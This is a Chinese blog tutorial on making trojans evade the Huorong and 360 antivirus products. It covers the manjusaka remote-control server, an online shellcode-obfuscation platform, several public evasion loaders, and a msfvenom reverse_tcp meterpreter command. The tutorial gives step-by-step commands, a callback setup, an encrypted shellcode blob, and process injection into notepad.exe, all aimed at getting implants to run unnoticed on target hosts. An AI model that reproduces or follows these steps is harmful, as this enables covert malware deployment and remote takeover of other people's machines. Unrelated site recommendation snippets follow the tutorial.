木马免杀之各类免杀工具的使用

最新推荐文章于 2025-04-06 08:05:07 发布
最新推荐文章于 2025-04-06 08:05:07 发布
阅读量563 收藏 28
点赞数 7
分类专栏: 木马免杀 系统入侵与提权 渗透测试 文章标签: github 木马免杀 渗透测试 msf框架 反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/YhMjQx/article/details/146134039
版权

文章目录

各类免杀工具的使用

课程目标

  1. 了解前边学到的免杀原理在工具中的应用
  2. 运用前边所学的免杀原理结合免杀的工具进行针对火绒和360的免杀
    我们平时在制作msf的木马时,如果直接放到目标机器上进行运行,可能会有火绒、360等杀毒软件进行拦截,阻止我们的木马执行。为了让我们的目标主机可以顺利执行我们的木马程序,在了解了免杀的原理之后,我们再来学习几个简单的工具

教材内容

一、常用的几个免杀工具
1、web界面远控 manjusaka

项目地址:https://github.com/YDHCUI/manjusaka

manjusaka 是一个基于web界面的仿 cobalt strike 做出的远控,生成的exe木马具有一定的免杀功效。

我们在centos7上搭建服务端,来供我们的客户端进行访问

yum -y install lrzsz unzip

直接下载安装包并上传到我们的centos7服务器上,上传成功后解压并执行

unzip manjusaka-main.zip 
cd manjusaka-main
chmod +x manjusaka

image-20230323175711725

执行成功后找到登陆界面的账号和密码,即可访问管理界面进行登陆

http://192.168.15.44:3200/manjusaka
用户名:manjusaka 密码:czcfrVutLmyc

image-20230324092705662

登陆成功后就是manjusaka的主页,里边显示我们上线的主机和可以执行的操作

image-20230324092742250

在目标设定中生成我们需要执行的木马程序

image-20230324093156277

点击生成NPC,就可以对木马程序的连接进行设置

设置回调的地址是我们服务器地址的80端口,加密的密钥随意,类型选择exe即可,同样这个可以对linux的系统进行主机上线

image-20230324094318786

点击下载之后就可以上传到目标主机进行执行

image-20230324094929373

可以躲避火绒和360的静态查杀

image-20230324094815965

可以执行的命令列表如下

help      打印帮助 
ps        查看进程 
ss        查看网络连接 
ls        枚举文件 
cd        切换目录
sh        执行系统命令 
cat       读取文本 
screen    执行截屏 
wget      下载文件
put       上传文件                        
inject    注入进程

可以执行系统命令或者查看当前进程

image-20230324095307412

image-20230324095517479

2、潮汐在线免杀平台

项目地址:http://bypass.tidesec.com/

潮汐免杀平台只需要我们上传shellcode就可以对上传的shellcode进行处理,编译成exe文件。打开我们的项目地址

image-20230324103543021

输入msf生成的shellcode。选择加密方式、密码和系统,用python的加载器生成

image-20230324104225450

生成成功后直接下载即可

image-20230324104306500

所有的在线平台的弊端就是时效性,因为是公开的所以免杀的效果会慢慢变差,可以自己找一些其他的在线网站进行免杀处理,潮汐平台目前不免杀

3. shellcode_loader

项目地址:https://github.com/Axx8/ShellCode_Loader

使用加密算法对shellcode 进行加密,但是因为是公开的项目,所以这些项目我们以学习项目思路为主

将项目下载下来,执行shellcode_encryption.exe shellcode.c ,即可生成一段密文shellcode

image-20230324105515374

然后将密文放进python文件的加载器,使用pyinstaller打包即可

JM0xIG55bjVQOtA39su1QyLxkEWo/MM8SiW6xpXoOxapgRZ6XGjeEUVGiOcXVdyeGQBsosEfKVmjVS/+X++XC+DeVEn3t2RNru44g6ren6wl9P5jwJTDH/iBH71RtwUkKQ0qjW5SihBXY0dCkByTnmuqR8hJyKwbUK10M5PJ8O04PsqVVj8bDlyP18emPc0Xb8MhPQBjv3+c9ipkQalwTrY9MtnzI0uIJYwWDtQAkqqSe1sPCgcTMXXkCvJDr5Bj7WNWPoBlkZCpnghfd2qWzgRkfj4YwyztswJDOE6dfi+nhjLKAhkeOKq+Dqzp74TuXpEWvSg3lQw5zDueUtzUTikVubJTGOL1vWfuoAxXrFJYkvaGG1tA1U6FNUTXKP9STh4GPZDTw7d+ex6JgA6+946rrcBQEIATg0jzdzisuGhj3mTauNmghjn14ELudYhvFQmRgv6jXjdtzrsJAf6/oZaTTHe5DgNvApvN9wxpeGLmVTPyxfDV0sBgSVGRhdSXkhYNQ1+p+5wV9svj5yI1lAE3K/ogpSTwvzWpSU74yk/O1BHHoo8C0NwaXvUJhoLgKq4wgseH30F/xIz1RIe0Esq71mbCjfN+vYPE0qRmwHS0hka7VEPNNVOOPHv8xbjEgdFYO+7qmUcf8QrdG2j8R0SQuclZkcDTUIwOHFOmbgOrtI+i4tS3rTkVNxKI5mDMykQR7uzH5qOXd1rt6o6oE2V9EZHuE9ekKZuSqXgkF9o5traWguBG9AzA4CHTqqjs8PBxt3ipeUeXFdgWN8f043p1njcP2Ku62rT7blqKOl2Zy0fWbPn7FJ0Iw5BDldJ8oaLnOm8vp1AD5HoOQ+RQCDXx4I/JOm80T2VfXPKHElIfQwUyie+QU7jV/Cyi47tsGzvUch1zdrInzSpTdxu2xg==

生成exe文件不免杀,但是过程中使用的AES加密算法的python加载器值得学习

4.Ant-AntV

项目地址:https://github.com/shellfeel/Ant-AntV

是一个实战使用过的免杀工具,在处理shellcode的时候免杀的效果较好,使用pyinstaller的加载器进行加载。

使用msf生成二进制文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.15.13 LPORT=6666 -f raw -o shellcode.bin

进入到项目后执行

pip install -r requirements.txt

安装依赖库,将msf生成的二进制文件shellcode.bin移动到bean_raw下,重命名为beacon.bin,之后执行命令打包成exe文件即可

python gen_trojan.py

对火绒和360均静态免杀

image-20230324103248450

5. 掩日

项目地址:https://github.com/1y0n/AV_Evasion_Tool

掩日是适用于红队的综合免杀工具,在安装环境依赖之后即可使用生成的shellcode生成免杀的木马程序

首先安装tdm-gcc和64位go语言环境

// tdm-gcc安装
https://github.com/jmeubank/tdm-gcc/releases/download/v9.2.0-tdm64-1/tdm64-gcc-9.2.0.exe
// go语言环境安装
https://go.dev/dl/go1.17.8.windows-amd64.msi

然后打开掩日即可

image-20230324111003639

以通用免杀和进程注入为例,使用生成的shellcode.c生成木马文件,加密算法选择默认的栅栏,注入进程为notepad.exe

image-20230324111427972

可以过火绒和360的静态查杀和火绒的动态查杀

课程小结

通过本节的课程,我们可以看到不管是别人开发的远控生成的木马文件,还是在线的免杀平台,还是一些公开的免杀项目,我们都可以使用这些工具对msf生成的shellcode进行处理,达到免杀的效果,工具处理过程中的思路我们也可以借助开源代码进行学习,丰富我们对于免杀的理解

(完整)免杀全教程【请勿用于非法】.pdf
10-09
第二部分介绍了木马免杀的对策。免杀通常包括以下几个步骤: 1. 使用未加壳的木马作为基础,因为加壳后的文件更容易被识别。 2. 针对瑞星的内存查杀,需要定位并修改内存特征码。 3. 对于其他杀毒软件,可以采取多种...
PC Hunter(强大的手工杀毒辅助工具)-32位
08-02
PC Hunter是一款功能强大的Windows系统信息查看软件,同时也是一款强大的手工杀毒软件,用它不但可以查看各类系统信息,也可以揪出电脑中的潜伏的病毒木马。 本工具目前初步实现如下功能: 1.进程、线程、进程模块...
无毒空间,一款可以玩的安全软件
08-04
行家们使用无毒空间,已知未知病毒木马将无处藏身,现阶段使用各种免杀技术以逃避各种查杀毒软件的高级木马也不例外; 精心的设计使得该系统避免了传统杀毒软件严重浪费用户电脑资源的问题,同时也基本达到HIPS的...
系统安全盾(SysShield)
06-19
开启了杀软的实时监控,防火墙监控,为什么还会不断地中木马,被各种IE插件悄悄安装?为什么我们不能在各类恶软载入系统前就阻止它的进入? 系统安全盾从实时注册表防护上直接屏蔽了各类易被侵入的安全键值;从文件...
360系统急救箱,用于系统文件的恢复
03-21
360系统急救箱(原顽固木马专杀大全)包括各种流行木马的查杀工具,可以快速、准确地查杀木马。包括犇牛、机器狗、灰鸽子、扫荡波、磁碟机等在内的各种木马,都可以用360系统急救箱进行查杀。要查杀木马,用360系统...
GitHub 趋势日报 (2025年04月01日)
qianmoQ - 关注云计算,关注大数据
04-02 1110
本日报由 TrendForge 系统生成 https://trendforge.devlive.org/
Augment Code:下一代AI编程助手,能否超越GitHub Copilot?
weixin_72708850的博客
04-05 1361
Augment Code 目前仍处于快速发展阶段,随着 AI 技术的进步,它有望进一步优化代码理解能力,并扩展更多编程语言的支持。未来,它是否能够真正超越 GitHub Copilot,成为 AI 编程助手的首选工具,还需要市场的进一步验证。该工具不仅帮助个人开发者编写代码,还专为团队协作设计,可以快速适应团队代码风格,并在多人协作环境下提供一致性建议。,可以适应大规模代码库,提供更加精准的代码建议,而不仅仅是基于单个文件的代码补全。,相比其他AI编程工具,它的速度更快,几乎可以实现。
推荐一个可以自定义github主页的网站
abcd123596的博客
03-25 1068
Profile Readme Generator 是一个开源工具,可以帮助你快速创建个性化的 GitHub 个人简介(README)。它支持自定义内容和样式,让你的 GitHub 个人主页更加美观和专业。
Github 2025-04-05 Rust开源项目日报 Top10
老孙正经胡说
04-05 669
根据Github Trendings的统计,今日(2025-04-05统计)共有10个项目上榜。
git的作用,以及和github的区别
2401_84019227的博客
03-30 1173
一般应该是,这个目录里面的数据经常改变的时候。而且你和他不想一起把这个文件夹越改越乱的话,两个人想法不一样,或者这个文件夹里面的东西,你是主要的开发者,别人是开源的参与者,那么你就可以不让别人修改主分支,但是可以拉一个新分支出去,就是fork,他在上面随便改,甚至也可以删掉,但是不影响你主分支的修改,如果他改的想合并到你的主分支上,就可以发一个pull request,就是请求你拉他的修改,把他修改的东西和你的分支进行一个合并。所以,git,github,分支都不是必要的,包括tag,看你需不需要而已。
Github 2025-04-06 php开源项目日报 Top10
最新发布
老孙正经胡说
04-06 412
根据Github Trendings的统计,今日(2025-04-06统计)共有10个项目上榜。
GitHub 上开源一个小项目的完整指南
qq_60865111的博客
04-04 1348
GitHub 上开源一个小项目的完整指南
GitHub上免费学习工具的精选汇总
我是赛博AI Lewis
03-29 1950
覆盖全领域的资源聚合(框架工具、文档等),如Awesome Python、Awesome React。:为开发者提供全栈学习路线图(前端、后端、Python等),每年更新,适合规划学习路径。:免费编程书籍与课程集合,涵盖Python、Java、Web开发等方向,支持多语言。:提供短小精悍的代码片段(JS、React、Python等),解决常见开发问题。:聚合主流编程语言(JS、React、Vue等)的官方文档,支持离线查阅。:免费API集合(天气、金融、社交等),适合开发实战与项目集成。
GitHub与Gitee各是什么?它们的区别与联系是什么?
m0_65595995的博客
04-02 1384
GitHub 适合全球开发者,尤其是开源项目。Gitee 更适合中国开发者,访问速度快,符合中国法律。选择时可根据项目需求、用户群体和法律法规决定。
GitHub上英语学习工具的精选分类汇总
我是赛博AI Lewis
04-02 1337
精选免费工具合集,涵盖字典(牛津、Linguee)、播客(Speak English Now)、YouTube频道(BBC Learning English)及学习平台(Busuu)。:一站式整合听、说、读、写全阶段资源,包括网站、Chrome插件、在线课程、电子书、游戏、播客(如BBC World Service)和翻译工具(DeepL/Linguee)。链接:https://github.com/Vuizur/awesome-language-learning#anki-flashcards。
标星 62.9 万,8 个 yyds 的 GitHub 开源项目 !
JEECG官方博客
03-25 1934
GitHub开源热门项目推荐
Github 2025-04-04Java开源项目日报 Top8
老孙正经胡说
04-04 950
根据Github Trendings的统计,今日(2025-04-04统计)共有8个项目上榜。
GitHub高级筛选小白使用手册
a6181816的博客
03-24 1744
GitHub 提供了强大的搜索功能,允许用户通过高级筛选器来精确查找仓库、Issues、Pull Requests、代码等。下面是一些常用的高级筛选用法,帮助你更高效地使用 GitHub 搜索功能。
JWT认证服务
ly1h1的博客
04-05 846
JSON Web Token(JWT)是一种用于在网络应用间安全地传递信息的紧凑、自包含的方式。以下是关于 JWT 认证服务器更详细的介绍,包括其意义、作用、工作原理、组成部分、时效性相关内容、搭建条件以及代码案例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值